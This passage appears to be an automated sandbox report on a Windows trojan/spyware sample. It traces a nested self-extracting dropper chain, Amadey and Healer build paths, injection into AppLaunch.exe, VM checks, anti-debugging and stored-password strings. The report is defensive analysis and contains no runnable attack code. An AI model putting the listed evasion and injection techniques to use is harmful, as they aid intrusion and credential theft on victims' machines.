                            Source: qu0t4ukLoN.exe, 00000000.00000003.356607577.00000000031D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeiP5ufeu: vs qu0t4ukLoN.exe
                            Source: qu0t4ukLoN.exe, 00000000.00000003.356501749.0000000004FC4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs qu0t4ukLoN.exe
                            Source: qu0t4ukLoN.exe, 00000000.00000003.356501749.0000000004FC4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeiP5ufeu: vs qu0t4ukLoN.exe
                            Source: qu0t4ukLoN.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs qu0t4ukLoN.exe
                            Source: qu0t4ukLoN.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppLaunch.exe.log
                            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@15/8@0/1
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeCode function: 0_2_00A93FEF CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,FormatMessageA,0_2_00A93FEF
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeCode function: 0_2_00A94FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,0_2_00A94FE0
                            Source: qu0t4ukLoN.exeReversingLabs: Detection: 52%
                            Source: qu0t4ukLoN.exeVirustotal: Detection: 52%
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                            Source: unknownProcess created: C:\Users\user\Desktop\qu0t4ukLoN.exe C:\Users\user\Desktop\qu0t4ukLoN.exe
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exe
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exe
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exe
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe
                            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeCode function: 0_2_00A9597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_00A9597D
                            Source: b7687179.exe, 00000006.00000002.426987259.0000000003690000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000003.422839734.000000000437B000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000003.422839734.000000000441D000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000003.422839734.00000000043CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                            Source: b7687179.exe.2.dr, SystemNetNetResA.csBase64 encoded string
                            Source: 6.0.b7687179.exe.e80000.0.unpack, SystemNetNetResA.csBase64 encoded string
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6104:120:WilError_01
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeCommand line argument: Kernel32.dll0_2_00A92BFB
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exeCommand line argument: Kernel32.dll1_2_00212BFB
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exeCommand line argument: Kernel32.dll2_2_00BC2BFB
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCommand line argument: P:A3_2_004139A0
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeAutomated click: OK
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exeAutomated click: OK
                            Source: qu0t4ukLoN.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                            Source: qu0t4ukLoN.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                            Source: qu0t4ukLoN.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                            Source: qu0t4ukLoN.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                            Source: qu0t4ukLoN.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                            Source: qu0t4ukLoN.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                            Source: qu0t4ukLoN.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                            Source: Binary string: wextract.pdb source: qu0t4ukLoN.exe, v7020033.exe.0.dr, v6434086.exe.1.dr
                            Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: v7020033.exe, 00000001.00000003.357315003.0000000004D41000.00000004.00000020.00020000.00000000.sdmp, v7020033.exe, 00000001.00000003.357393527.00000000030CD000.00000004.00000020.00020000.00000000.sdmp, c6803120.exe.1.dr
                            Source: Binary string: wextract.pdbGCTL source: qu0t4ukLoN.exe, v7020033.exe.0.dr, v6434086.exe.1.dr
                            Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: a4758283.exe, 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmp, a4758283.exe, 00000003.00000003.360898057.0000000000472000.00000040.00001000.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.383174563.0000000004182000.00000020.00000400.00020000.00000000.sdmp
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeCode function: 0_2_00A9724D push ecx; ret 0_2_00A97260
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exeCode function: 1_2_0021724D push ecx; ret 1_2_00217260
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exeCode function: 2_2_00BC724D push ecx; ret 2_2_00BC7260
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: 3_2_0040D2D9 push ecx; ret 3_2_0040D2EC
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: 3_2_00406D88 push ecx; ret 3_2_00406D9B
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeCode function: 0_2_00A9202A memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,GetModuleFileNameA,LocalAlloc,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00A9202A
                            Source: b7687179.exe.2.drStatic PE information: 0x9F8A3121 [Mon Oct 26 13:24:49 2054 UTC]
                            Source: d4851931.exe.0.drStatic PE information: section name: .OuoYr
                            Source: a4758283.exe.2.drStatic PE information: section name: .miJql
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exe
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exeFile created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\d4851931.exe
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exeFile created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exe
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\c6803120.exe
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exe
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeCode function: 0_2_00A91AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00A91AE8
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exeCode function: 1_2_00211AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,1_2_00211AE8
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exeCode function: 2_2_00BC1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,2_2_00BC1AE8
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7016Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe TID: 3952Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe TID: 4184Thread sleep count: 1813 > 30
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe TID: 2104Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeWindow / User API: threadDelayed 1813
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-2450
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_2-2451
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-2450
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP000.TMP\d4851931.exe
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP001.TMP\c6803120.exe
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: b7687179.exe, 00000006.00000003.422596878.00000000015B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
                            Source: b7687179.exe, 00000006.00000003.422596878.00000000015BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
                            Source: b7687179.exe, 00000006.00000003.422596878.00000000015B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMware62M6346KWin32_VideoControllerCWXSDRRHVideoController120060621000000.000000-000.3874714display.infMSBDAGU18O1FLPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsEYYOVXXW
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information queried: ProcessInformation
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeCode function: 0_2_00A95467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_00A95467
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeCode function: 0_2_00A92390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00A92390
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exeCode function: 1_2_00212390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00212390
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exeCode function: 2_2_00BC2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_00BC2390
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeCode function: 0_2_00A9202A memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,GetModuleFileNameA,LocalAlloc,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00A9202A
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: 3_2_00406CDA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00406CDA
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess token adjusted: Debug
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeMemory allocated: page read and write | page guard
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeCode function: 0_2_00A96F40 SetUnhandledExceptionFilter,0_2_00A96F40
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeCode function: 0_2_00A96CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00A96CF0
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exeCode function: 1_2_00216F40 SetUnhandledExceptionFilter,1_2_00216F40
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exeCode function: 1_2_00216CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00216CF0
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exeCode function: 2_2_00BC6F40 SetUnhandledExceptionFilter,2_2_00BC6F40
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exeCode function: 2_2_00BC6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00BC6CF0
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: 3_2_0040885A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0040885A
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: 3_2_0040C4CD SetUnhandledExceptionFilter,3_2_0040C4CD
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: 3_2_00406CDA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00406CDA
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: 3_2_00403D40 _abort,__NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00403D40
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: 3_2_00404D05 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00404D05

                            HIPS / PFW / Operating System Protection Evasion

                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 4180000 protect: page execute and read and write
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 4180000 value starts with: 4D5A
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 4180000
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 43FB008
                            Source: b7687179.exe.2.dr, SystemDataCommonTimeSpanStorager.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibraryA@kernel32.dll')
                            Source: 3.3.a4758283.exe.470000.0.unpack, Program.csReference to suspicious API methods: ('OpenProcessToken', 'OpenProcessToken@advapi32.dll')
                            Source: 5.2.AppLaunch.exe.4180000.0.unpack, Program.csReference to suspicious API methods: ('OpenProcessToken', 'OpenProcessToken@advapi32.dll')
                            Source: 6.0.b7687179.exe.e80000.0.unpack, SystemDataCommonTimeSpanStorager.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibraryA@kernel32.dll')
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeCode function: 0_2_00A918A3 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,0_2_00A918A3
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: GetLocaleInfoA,3_2_0041195E
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,3_2_00414965
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,3_2_0041117F
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,3_2_0040F990
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_00411240
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,3_2_00410256
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,3_2_00409A6D
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,3_2_004112E3
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,3_2_00414AE9
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_004112A7
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exe Code function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,3_2_00414AB5
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,3_2_00414C28
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exe Code function: GetLocaleInfoA,3_2_0040A571
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exe Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP,3_2_00410D8A
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,3_2_00410EA1
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exe Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,3_2_00410F39
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,3_2_004117D0
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exe Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,3_2_0040FFFE
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,3_2_00410FAD
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe Queries volume information: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
